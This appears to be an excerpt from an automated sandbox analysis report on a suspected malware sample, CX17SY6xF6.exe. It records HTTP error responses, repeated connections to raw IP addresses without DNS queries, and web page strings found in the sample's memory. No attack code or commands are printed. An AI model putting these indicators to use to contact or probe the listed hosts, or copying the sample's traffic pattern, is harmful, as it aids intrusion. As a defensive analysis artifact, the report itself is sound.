                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 27 Jul 2023 19:54:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 148Connection: keep-aliveX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffX-Kong-Upstream-Latency: 3X-Kong-Proxy-Latency: 1Via: kong/1.4.1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 4f 53 54 20 2f 70 61 72 6b 69 6e 67 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot POST /parking/</pre></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Thu, 27 Jul 2023 19:54:41 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 7ed76f8e2f229116-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 27 Jul 2023 19:54:44 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 318Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:44 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:54:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=18X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 82e07901-e699-4dc1-abc7-b9be8c675b4aCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0Yb1VTKJK0dnDQvbV9qtbH3pdrL84CZtK4pDZSvI8oX%2BJ71V0gD%2BRDWxBmytgJN9vPOW9H1NHp7KjbnFSJe9oHsfFE7izcBv1c42ncPeV3Aq07mtsOeAgcbQ2uOb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=150.000095Server: cloudflareCF-RAY: 7ed76f9f484d91de-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:45 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j4EZH1F%2BwT0Pfdc6%2BJThZsfKpRm5SEe9DJKoTLpv5B6KAn2kkPgjcyDPsWu61EbinA%2B9er52V0gB6OJXBZR3R5jzR7k2OCmInA0wuYrUsIaumjnG8UIUg7RDzGk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76fa2184f1987-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.1.81.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 211.13.196.162
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/PohlFoodService" target="_blank"> equals www.facebook.com (Facebook)
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.linkedin.com/company/pohl-food-service" target="_blank"> equals www.linkedin.com (Linkedin)
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-6def677" href="https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A" target="_blank"> equals www.youtube.com (Youtube)
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="footicons" href="https://www.linkedin.com/company/elpro-lepenik/about/" target="_blank"><img id="LinkedIn" alt="LinkedIn" data-src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Linked-Grey.svg" class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" /><noscript><img id="LinkedIn" alt="LinkedIn" src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Linked-Grey.svg" /></noscript></a> equals www.linkedin.com (Linkedin)
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="footicons" href="https://www.facebook.com/elprolepenik/" target="_blank"><img id="Facebook" alt="Facebook" data-src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-FB-Grey.svg" class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" /><noscript><img id="Facebook" alt="Facebook" src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-FB-Grey.svg" /></noscript></a> equals www.facebook.com (Facebook)
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/PohlFoodService" /> equals www.facebook.com (Facebook)
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/elprolepenik/" /> equals www.facebook.com (Facebook)
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Elpro Lepenik proizvodnja temperaturnih tipal in merilno regulacijska tehnika","publisher":{"@id":"https://www.elpro.si/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.elpro.si/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"sl-SI"},{"@type":"Organization","@id":"https://www.elpro.si/#organization","name":"ELPRO","url":"https://www.elpro.si/","logo":{"@type":"ImageObject","inLanguage":"sl-SI","@id":"https://www.elpro.si/#/schema/logo/image/","url":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","contentUrl":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","width":1,"height":1,"caption":"ELPRO"},"image":{"@id":"https://www.elpro.si/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/elprolepenik/","https://www.linkedin.com/company/elpro-lepenik/about/"]}]}</script> equals www.facebook.com (Facebook)
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Elpro Lepenik proizvodnja temperaturnih tipal in merilno regulacijska tehnika","publisher":{"@id":"https://www.elpro.si/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.elpro.si/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"sl-SI"},{"@type":"Organization","@id":"https://www.elpro.si/#organization","name":"ELPRO","url":"https://www.elpro.si/","logo":{"@type":"ImageObject","inLanguage":"sl-SI","@id":"https://www.elpro.si/#/schema/logo/image/","url":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","contentUrl":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","width":1,"height":1,"caption":"ELPRO"},"image":{"@id":"https://www.elpro.si/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/elprolepenik/","https://www.linkedin.com/company/elpro-lepenik/about/"]}]}</script> equals www.linkedin.com (Linkedin)
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-linkedin elementor-repeater-item-dd39117" href="https://www.linkedin.com/company/comsit-distribution-gmbh/" target="_blank"> equals www.linkedin.com (Linkedin)
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Auf Facebook teilen","shareOnTwitter":"Auf Twitter teilen","pinIt":"Anheften","download":"Download","downloadImage":"Bild downloaden","fullscreen":"Vollbild","zoom":"Zoom","share":"Teilen","playVideo":"Video abspielen","previous":"Zur\u00fcck","next":"Weiter","close":"Schlie\u00dfen","a11yCarouselWrapperAriaLabel":"Carousel | Horizontal scrolling: Arrow Left & Right","a11yCarouselPrevSlideMessage":"Previous slide","a11yCarouselNextSlideMessage":"Next slide","a11yCarouselFirstSlideMessage":"This is the first slide","a11yCarouselLastSlideMessage":"This is the last slide","a11yCarouselPaginationBulletMessage":"Go to slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Breitbild","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.14.1","is_static":false,"experimentalFeatures":{"e_dom_optimization":true,"e_optimized_assets_loading":true,"e_optimized_css_loading":true,"a11y_improvements":true,"additional_custom_breakpoints":true,"e_swiper_latest":true,"theme_builder_v2":true,"hello-theme-header-footer":true,"landing-pages":true,"page-transitions":true,"notes":true,"loop":true,"form-submissions":true,"e_scroll_snap":true},"urls":{"assets":"http:\/\/www.com-sit.com\/wp-content\/plugins\/elementor\/assets\/"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","hello_header_logo_type":"title","hello_header_menu_layout":"horizontal","hello_footer_logo_type":"logo"},"post":{"id":46,"title":"Comsit%20Website","excerpt":"","featuredImage":false}}; equals www.facebook.com (Facebook)
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Auf Facebook teilen","shareOnTwitter":"Auf Twitter teilen","pinIt":"Anheften","download":"Download","downloadImage":"Bild downloaden","fullscreen":"Vollbild","zoom":"Zoom","share":"Teilen","playVideo":"Video abspielen","previous":"Zur\u00fcck","next":"Weiter","close":"Schlie\u00dfen","a11yCarouselWrapperAriaLabel":"Carousel | Horizontal scrolling: Arrow Left & Right","a11yCarouselPrevSlideMessage":"Previous slide","a11yCarouselNextSlideMessage":"Next slide","a11yCarouselFirstSlideMessage":"This is the first slide","a11yCarouselLastSlideMessage":"This is the last slide","a11yCarouselPaginationBulletMessage":"Go to slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Breitbild","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.14.1","is_static":false,"experimentalFeatures":{"e_dom_optimization":true,"e_optimized_assets_loading":true,"e_optimized_css_loading":true,"a11y_improvements":true,"additional_custom_breakpoints":true,"e_swiper_latest":true,"theme_builder_v2":true,"hello-theme-header-footer":true,"landing-pages":true,"page-transitions":true,"notes":true,"loop":true,"form-submissions":true,"e_scroll_snap":true},"urls":{"assets":"http:\/\/www.com-sit.com\/wp-content\/plugins\/elementor\/assets\/"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","hello_header_logo_type":"title","hello_header_menu_layout":"horizontal","hello_footer_logo_type":"logo"},"post":{"id":46,"title":"Comsit%20Website","excerpt":"","featuredImage":false}}; equals www.twitter.com (Twitter)
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://2.gravatar.com/avatar/8f1795d9778dd5337c87d22e0464e1c3?s=96&amp;d=mm&amp;r=g
